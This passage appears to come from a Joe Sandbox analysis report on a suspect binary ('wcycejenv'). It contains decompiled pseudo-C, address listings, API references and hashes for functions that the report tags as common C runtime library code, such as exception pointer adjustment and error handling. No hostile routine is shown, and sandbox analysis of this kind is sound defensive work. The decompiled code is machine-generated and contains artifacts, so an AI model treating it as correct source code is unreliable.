							_t145 = _t120 >> 0x0000000f & 1;
							__eflags = _t120 - 1;
							if(_t120 <= 1) {
								_t86 =  *0x456018; // 0x0
								_t87 =  *_t86;
								__eflags = _t87;
								if(_t87 == 0) {
									L24:
									_t124 =  *(_t150 - 0x10);
									__eflags = _t124;
									if(_t124 != 0) {
										__eflags = _t149;
										if(_t149 != 0) {
											_t120 = _t120 | 0x00000200;
											__eflags = _t120;
											 *(_t150 - 0x14) = _t120;
										}
									}
									__eflags = _t145;
									if(_t145 != 0) {
										_t120 = _t120 | 0x00008000;
										__eflags = _t120;
										 *(_t150 - 0x14) = _t120;
									}
									__eflags = _t149;
									if(_t149 == 0) {
										goto L15;
									} else {
										__eflags = 0x00001000 & _t120;
										if((0x00001000 & _t120) != 0) {
											goto L15;
										}
										_t88 =  *0x456018; // 0x0
										_t89 =  *_t88;
										__eflags = _t89;
										if(_t89 == 0) {
											L35:
											__eflags =  *0x456020 & 0x00001000;
											if(( *0x456020 & 0x00001000) == 0) {
												L39:
												E0040B201(_t124,  *(_t150 + 8), _t150 - 0x18);
												goto L43;
											}
											__eflags = _t124;
											if(_t124 != 0) {
												goto L39;
											}
											__eflags = 0x00008000 & _t120;
											if((0x00008000 & _t120) != 0) {
												goto L39;
											}
											 *(_t150 - 0x30) =  *(_t150 - 0x30) & _t124;
											 *(_t150 - 0x2c) =  *(_t150 - 0x2c) & _t124;
											E0040B201(_t124, _t150 - 0x28, _t150 - 0x30);
											goto L15;
										}
										__eflags = _t89 - 0x40;
										if(_t89 == 0x40) {
											 *0x456018 =  *0x456018 + 1;
											__eflags =  *0x456018;
											goto L35;
										}
										goto L33;
									}
								}
								__eflags = _t87 - 0x40;
								if(_t87 == 0x40) {
									goto L24;
								}
								E0040F5BA(_t140, _t150 - 0x28);
								_t97 =  *(_t150 - 0x28);
								__eflags = _t97;
								if(_t97 == 0) {
									goto L24;
								}
								__eflags =  *0x456024;
								_t130 = _t150 - 0x20;
								if( *0x456024 == 0) {
									 *(_t150 - 0x20) = _t97;
									 *(_t150 - 0x1c) =  *(_t150 - 0x24);
									 *(_t150 - 0x30) = "::";
									 *(_t150 - 0x2c) = 2;
									E0040AF6A(_t130, _t150 - 0x30);
									_push(_t150 - 0x18);
									_t102 = _t150 - 0x28;
									L23:
									_push(_t102);
									_t103 = E0040AEC8(_t150 - 0x20);
									_t120 = _t103[1];
									_t149 =  *_t103;
									 *(_t150 - 0x14) = _t120;
									 *(_t150 - 0x18) = _t149;
									goto L24;
								}
								 *0x456024 = 0;
								 *(_t150 - 0x20) = _t149;
								 *(_t150 - 0x1c) = _t120;
								E0040AFC2(_t130, _t150 - 0x28);
								_t106 =  *0x456018; // 0x0
								_t149 =  *(_t150 - 0x20);
								_t120 =  *(_t150 - 0x1c);
								 *(_t150 - 0x18) = _t149;
								__eflags =  *_t106 - 0x40;
								 *(_t150 - 0x14) = _t120;
								if( *_t106 == 0x40) {
									goto L24;
								}
								_t108 = E0040F5BA(_t140, _t150 - 0x30);
								 *(_t150 - 0x28) = "::";
								 *(_t150 - 0x24) = 2;
								 *(_t150 - 0x1c) = _t108[1];
								 *(_t150 - 0x20) =  *_t108;
								E0040AF6A(_t150 - 0x20, _t150 - 0x28);
								_push(_t150 - 0x18);
								_t102 = _t150 - 0x30;
								goto L23;
							}
							L15:
							_t79 =  *(_t150 + 8);
							 *_t79 = _t149;
							_t79[1] = _t120;
							goto L44;
						}
						__eflags = _t120 & 0x00000200;
						if((_t120 & 0x00000200) == 0) {
							goto L13;
						}
						 *(_t150 - 0x10) = 1;
						goto L14;
					}
					__eflags =  *((char*)(_t81 + 1)) - 0x3f;
					if(__eflags != 0) {
						goto L10;
					}
					_push(_t150 - 0x28);
					E0040D604(__ebx, __edx, __edi, 0x2000, __eflags);
					_t115 =  *0x456018; // 0x0
					while(1) {
						__eflags =  *_t115;
						if( *_t115 == 0) {
							break;
						}
						_t115 = _t115 + 1;
						__eflags = _t115;
						 *0x456018 = _t115;
					}
					L2:
					_t79 =  *(_t150 + 8);
					 *_t79 =  *(_t150 - 0x28);
					_t79[1] =  *(_t150 - 0x24);
					goto L44;
				}
				 *0x456020 = _t76 & 0xffffdfff;
				E0040D52D(__ebx, _t150 - 0x28, 0);
				 *0x456020 =  *0x456020 | 0x00002000;
				goto L2;
			}

0x0040d604
0x0040d604
0x0040d604
0x0040d604
0x0040d60b
0x0040d610
0x0040d616
0x0040d61f
0x0040d626
0x0040d658
0x0040d65e
0x0040d660
0x0040d662
0x0040d83b
0x0040d83d
0x0040d7f7
0x0040d7f7
0x0040d841
0x0040d844
0x0040d849
0x0040d849
0x0040d84c
0x0040d84c
0x0040d857
0x0040d857
0x0040d83f
0x00000000
0x0040d83f
0x0040d668
0x0040d668
0x0040d66b
0x0040d670
0x0040d673
0x0040d699
0x0040d69d
0x0040d6a2
0x0040d6a7
0x0040d6ac
0x0040d6ae
0x0040d6bd
0x0040d6bd
0x0040d6bd
0x0040d6bd
0x0040d6c1
0x0040d6c6
0x0040d6c8
0x0040d6cb
0x0040d6da
0x0040d6df
0x0040d6e1
0x0040d6e3
0x0040d7b1
0x0040d7b1
0x0040d7b4
0x0040d7b6
0x0040d7b8
0x0040d7ba
0x0040d7bc
0x0040d7bc
0x0040d7c2
0x0040d7c2
0x0040d7ba
0x0040d7ca
0x0040d7cc
0x0040d7ce
0x0040d7ce
0x0040d7d0
0x0040d7d0
0x0040d7d3
0x0040d7d5
0x00000000
0x0040d7db
0x0040d7e0
0x0040d7e2
0x00000000
0x00000000
0x0040d7e8
0x0040d7ed
0x0040d7ef
0x0040d7f1
0x0040d801
0x0040d801
0x0040d807
0x0040d82b
0x0040d832
0x00000000
0x0040d838
0x0040d809
0x0040d80b
0x00000000
0x00000000
0x0040d80d
0x0040d80f
0x00000000
0x00000000
0x0040d811
0x0040d817
0x0040d81f
0x00000000
0x0040d825
0x0040d7f3
0x0040d7f5
0x0040d7fb
0x0040d7fb
0x00000000
0x0040d7fb
0x00000000
0x0040d7f5
0x0040d7d5
0x0040d6e9
0x0040d6eb
0x00000000
0x00000000
0x0040d6f5
0x0040d6fa
0x0040d6fe
0x0040d700
0x00000000
0x00000000
0x0040d706
0x0040d70d
0x0040d710
0x0040d776
0x0040d77c
0x0040d783
0x0040d78a
0x0040d791
0x0040d799
0x0040d79a
0x0040d79d
0x0040d79d
0x0040d7a1
0x0040d7a6
0x0040d7a9
0x0040d7ab
0x0040d7ae
0x00000000
0x0040d7ae
0x0040d715
0x0040d71d
0x0040d720
0x0040d723
0x0040d728
0x0040d72d
0x0040d730
0x0040d733
0x0040d736
0x0040d739
0x0040d73c
0x00000000
0x00000000
0x0040d742
0x0040d748
0x0040d74f
0x0040d75b
0x0040d761
0x0040d768
0x0040d770
0x0040d771
0x00000000
0x0040d771
0x0040d6cd
0x0040d6cd
0x0040d6d0
0x0040d6d2
0x00000000
0x0040d6d2
0x0040d6b0
0x0040d6b6
0x00000000
0x00000000
0x0040d6b8
0x00000000
0x0040d6b8
0x0040d675
0x0040d679
0x00000000
0x00000000
0x0040d67e
0x0040d67f
0x0040d684
0x0040d692
0x0040d692
0x0040d695
0x00000000
0x00000000
0x0040d68c
0x0040d68c
0x0040d68d
0x0040d68d
0x0040d645
0x0040d645
0x0040d64b
0x0040d650
0x00000000
0x0040d650
0x0040d62d
0x0040d638
0x0040d63d
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 0040D60B
UnDecorator::getSymbolName.LIBCMT ref: 0040D69D
DName::operator+.LIBCMT ref: 0040D7A1
DName::DName.LIBVCRUNTIME ref: 0040D844

Part of subcall function 0040AF6A: shared_ptr.LIBCMT ref: 0040AF86

Part of subcall function 0040B201: DName::DName.LIBVCRUNTIME ref: 0040B25F

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: Name$Name::$Decorator::getH_prolog3Name::operator+Symbolshared_ptr
String ID:
API String ID: 1134295639-0
Opcode ID: 6defc93781041cc9f0ce38c8de51078c24744251218303531f98184532c74456
Instruction ID: a2cde962515f302a11298a9b6324805da51d8c60fdf71ed550896f9fdb778d31
Opcode Fuzzy Hash: 6defc93781041cc9f0ce38c8de51078c24744251218303531f98184532c74456
Instruction Fuzzy Hash: 4D714CB1D003098FDB10DF94D884AEEBBB4AF08711F55403BE815BB2D2D7399949CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411F68 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 67%

			E00411F68(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x451110);
				E00408200(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00409220(_t107, E00409E77(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00409220(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x455fc4;
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x4492c4();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0042B9D6(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x451130);
									E00408200(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00411F68(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00412E53(_t103, _t108[0x18], E00409E77( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00412E63(_t103, _t108[0x18], E00409E77( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00409E77();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00411f68
0x00411f6a
0x00411f6f
0x00411f74
0x00411f76
0x00411f79
0x00411f7e
0x0041208e
0x0041208e
0x0041208e
0x00000000
0x00411f8d
0x00411f8d
0x00411f92
0x00411f9c
0x00411f9e
0x00411fa3
0x00411fa8
0x00411fa8
0x00411faa
0x00411fad
0x00411fb2
0x00411fd4
0x00411fd4
0x00411fd7
0x00411fda
0x00411ff8
0x00411ffb
0x0041203a
0x0041203d
0x00412040
0x00412065
0x00412067
0x00000000
0x00412069
0x00412069
0x0041206b
0x00000000
0x0041206d
0x0041206d
0x00412072
0x00412076
0x00412076
0x00412077
0x00000000
0x00412077
0x0041206b
0x00412042
0x00412042
0x00412044
0x00000000
0x00412046
0x00412046
0x00412048
0x00000000
0x0041204a
0x0041205b
0x00000000
0x00412060
0x00412048
0x00412044
0x00411ffd
0x00411ffd
0x00412001
0x00000000
0x00412007
0x00412007
0x00412009
0x00000000
0x0041200f
0x00412016
0x0041201e
0x00412022
0x00412024
0x00412027
0x0041202c
0x0041202d
0x00000000
0x0041202d
0x00412027
0x00000000
0x00412022
0x00412009
0x00412001
0x00411fdc
0x00411fdc
0x00000000
0x00411fdc
0x00411fb9
0x00411fb9
0x00411fbe
0x00411fc3
0x00000000
0x00411fc5
0x00411fc7
0x00411fd0
0x00411fdf
0x00411fe1
0x004120a0
0x004120a0
0x004120a5
0x004120a6
0x004120a8
0x004120ad
0x004120b2
0x004120b5
0x004120b8
0x004120bb
0x004120c4
0x004120c4
0x004120bd
0x004120bd
0x004120bd
0x004120c7
0x004120cb
0x004120ce
0x004120cf
0x004120d0
0x004120d1
0x004120d4
0x004120dd
0x004120dd
0x004120e0
0x00412116
0x004120e2
0x004120e2
0x004120e2
0x004120e5
0x004120fc
0x004120fc
0x004120e5
0x0041211b
0x00412125
0x00412131
0x00411fef
0x00411fef
0x00411ff4
0x00411ff5
0x0041202f
0x00412036
0x0041207a
0x0041207a
0x00412081
0x00412090
0x00412093
0x0041209f
0x0041209f
0x00411fe1
0x00411fc3
0x00000000
0x00000000
0x00000000
0x00411f92

APIs

___AdjustPointer.LIBCMT ref: 0041202F
___AdjustPointer.LIBCMT ref: 00412052
___AdjustPointer.LIBCMT ref: 004120EE

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: c74a708d9ff94c0065519344fe168304b3e974fd1207a2ecf21e9a93df1776bb
Instruction ID: fb51b45b2c18bf970e11f47da0407b2ffdec97468414d0f2941073cd49f00ae6
Opcode Fuzzy Hash: c74a708d9ff94c0065519344fe168304b3e974fd1207a2ecf21e9a93df1776bb
Instruction Fuzzy Hash: 8051E671500606AFDB24CF51D641BFB7BA5EF08304F10062FEA45972A1D7B9ACE1C799

Uniqueness

Uniqueness Score: -1.00%

Function 00430D07 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00430D07(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00432DAF(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00432DAF(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E0042C0FF(GetLastError());
									_t19 =  *((intOrPtr*)(E0042C135(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00431A8C(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E0042C0FF(GetLastError());
						return  *((intOrPtr*)(E0042C135(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00431A8C(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00431A58(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x00430d0e
0x00430d13
0x00430d31
0x00430d33
0x00430d36
0x00430d63
0x00430d6b
0x00430d6d
0x00430d86
0x00430d89
0x00430d8c
0x00430d9a
0x00430da9
0x00430db1
0x00430db3
0x00430dcc
0x00430dcf
0x00430dcf
0x00430db5
0x00430dbc
0x00430dc7
0x00430dc7
0x00430dd1
0x00000000
0x00430dd1
0x00430d91
0x00430d96
0x00430d98
0x00000000
0x00000000
0x00000000
0x00430d98
0x00430d76
0x00000000
0x00430d81
0x00430d38
0x00430d3b
0x00430d3e
0x00430d51
0x00430d54
0x00430d27
0x00430d27
0x00000000
0x00430d2a
0x00430d44
0x00430d49
0x00430d4b
0x00430dd5
0x00430dd5
0x00000000
0x00430d4b
0x00430d15
0x00430d1a
0x00430d1f
0x00430d21
0x00430d24
0x00000000

APIs

Part of subcall function 00431A58: _free.LIBCMT ref: 00431A66

Part of subcall function 00432DAF: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,7FFFFFFF,?,00000001,?,00000000,?,?,0042E7A2,?,00000000,00000006), ref: 00432E51

GetLastError.KERNEL32 ref: 00430D6F
__dosmaperr.LIBCMT ref: 00430D76
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00430DB5
__dosmaperr.LIBCMT ref: 00430DBC

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: f802f93be1d0c2a817df5f04e894d51c6435cd97d9f96d65588e75a84402d521
Instruction ID: efe5f68b817bcdb448b6f53b9cfcc69d99f9349433a55bdc6d62321043400bbe
Opcode Fuzzy Hash: f802f93be1d0c2a817df5f04e894d51c6435cd97d9f96d65588e75a84402d521
Instruction Fuzzy Hash: B121F771200219AF9B206FE68C9093BB7ECEF08368F10561AF81597251DB39FC118B98

Uniqueness

Uniqueness Score: -1.00%

Function 0042DA10 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E0042DA10(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x4542a8; // 0x6
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E0042CBD2(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E00430BC8(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E0042CBD2(__eflags,  *0x4542a8, _t51);
							if(__eflags != 0) {
								E0042D686(_t51, 0x456af4);
								E0042E2C2(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E0042CBD2(__eflags,  *0x4542a8, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E0042CBD2(0,  *0x4542a8, 0);
							_push(0);
							L9:
							E0042E2C2();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E0042CB93(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x4542a8; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E0042B9D6(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x4542a8; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E0042CBD2(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00430BC8(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E0042CBD2(__eflags,  *0x4542a8, _t60);
								if(__eflags != 0) {
									E0042D686(_t60, 0x456af4);
									E0042E2C2(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E0042CBD2(__eflags,  *0x4542a8, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E0042CBD2(__eflags,  *0x4542a8, _t20);
								_push(_t60);
								L25:
								E0042E2C2();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E0042CB93(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x4542a8; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E0042B9D6(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x4542a8; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E0042CBD2(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00430BC8(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E0042CBD2(__eflags,  *0x4542a8, _t54);
											if(__eflags != 0) {
												E0042D686(_t54, 0x456af4);
												E0042E2C2(0);
												goto L45;
											} else {
												_t40 = 0;
												E0042CBD2(__eflags,  *0x4542a8, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E0042CBD2(0,  *0x4542a8, 0);
											_push(0);
											L41:
											E0042E2C2();
											goto L36;
										}
									}
								} else {
									_t54 = E0042CB93(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x4542a8; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x0042da10
0x0042da10
0x0042da1b
0x0042da1d
0x0042da22
0x0042da25
0x0042da43
0x0042da46
0x0042da4b
0x0042da4d
0x00000000
0x0042da4f
0x0042da5b
0x0042da5e
0x0042da5f
0x0042da61
0x0042da86
0x0042da88
0x0042daa1
0x0042daa8
0x0042daad
0x00000000
0x0042da8a
0x0042da8a
0x0042da93
0x0042da98
0x00000000
0x0042da98
0x0042da63
0x0042da63
0x0042da63
0x0042da6c
0x0042da71
0x0042da72
0x0042da72
0x0042da77
0x00000000
0x0042da77
0x0042da61
0x0042da27
0x0042da2d
0x0042da31
0x0042da3e
0x00000000
0x0042da33
0x0042da36
0x0042dab0
0x0042dab0
0x0042da38
0x0042da38
0x0042da38
0x0042da3a
0x0042da3a
0x0042da3a
0x0042da36
0x0042da31
0x0042dab3
0x0042dabb
0x0042dabd
0x0042dabf
0x0042dac7
0x0042dacc
0x0042dacd
0x0042dad2
0x0042dad3
0x0042dad6
0x0042daf0
0x0042daf3
0x0042daf8
0x0042dafa
0x00000000
0x0042dafc
0x0042db08
0x0042db0b
0x0042db0c
0x0042db0e
0x0042db31
0x0042db33
0x0042db4a
0x0042db51
0x0042db56
0x00000000
0x0042db35
0x0042db3c
0x0042db41
0x00000000
0x0042db41
0x0042db10
0x0042db17
0x0042db1c
0x0042db1d
0x0042db1d
0x0042db22
0x00000000
0x0042db22
0x0042db0e
0x0042dad8
0x0042dade
0x0042dae0
0x0042dae2
0x0042daeb
0x00000000
0x0042dae4
0x0042dae4
0x0042dae7
0x0042db61
0x0042db61
0x0042db66
0x0042db69
0x0042db6a
0x0042db6b
0x0042db72
0x0042db74
0x0042db79
0x0042db7c
0x0042db9a
0x0042db9d
0x0042dba2
0x0042dba4
0x00000000
0x0042dba6
0x0042dbb2
0x0042dbb6
0x0042dbb8
0x0042dbdd
0x0042dbdf
0x0042dbf8
0x0042dbff
0x00000000
0x0042dbe1
0x0042dbe1
0x0042dbea
0x0042dbef
0x00000000
0x0042dbef
0x0042dbba
0x0042dbba
0x0042dbba
0x0042dbc3
0x0042dbc8
0x0042dbc9
0x0042dbc9
0x00000000
0x0042dbce
0x0042dbb8
0x0042db7e
0x0042db84
0x0042db86
0x0042db88
0x0042db95
0x00000000
0x0042db8a
0x0042db8a
0x0042db8d
0x0042dc07
0x0042dc07
0x0042db8f
0x0042db8f
0x0042db8f
0x0042db8f
0x0042db91
0x0042db91
0x0042db91
0x0042db8d
0x0042db88
0x0042dc0a
0x0042dc12
0x0042dc14
0x0042dc14
0x0042dc1b
0x0042dae9
0x0042db59
0x0042db59
0x0042db5b
0x00000000
0x0042db5d
0x0042db60
0x0042db60
0x0042db5b
0x0042dae7
0x0042dae2
0x0042dac1
0x0042dac6
0x0042dac6

APIs

GetLastError.KERNEL32(?,?,?,0041338C,?,?,?,?,00416B39,?), ref: 0042DA15
_free.LIBCMT ref: 0042DA72
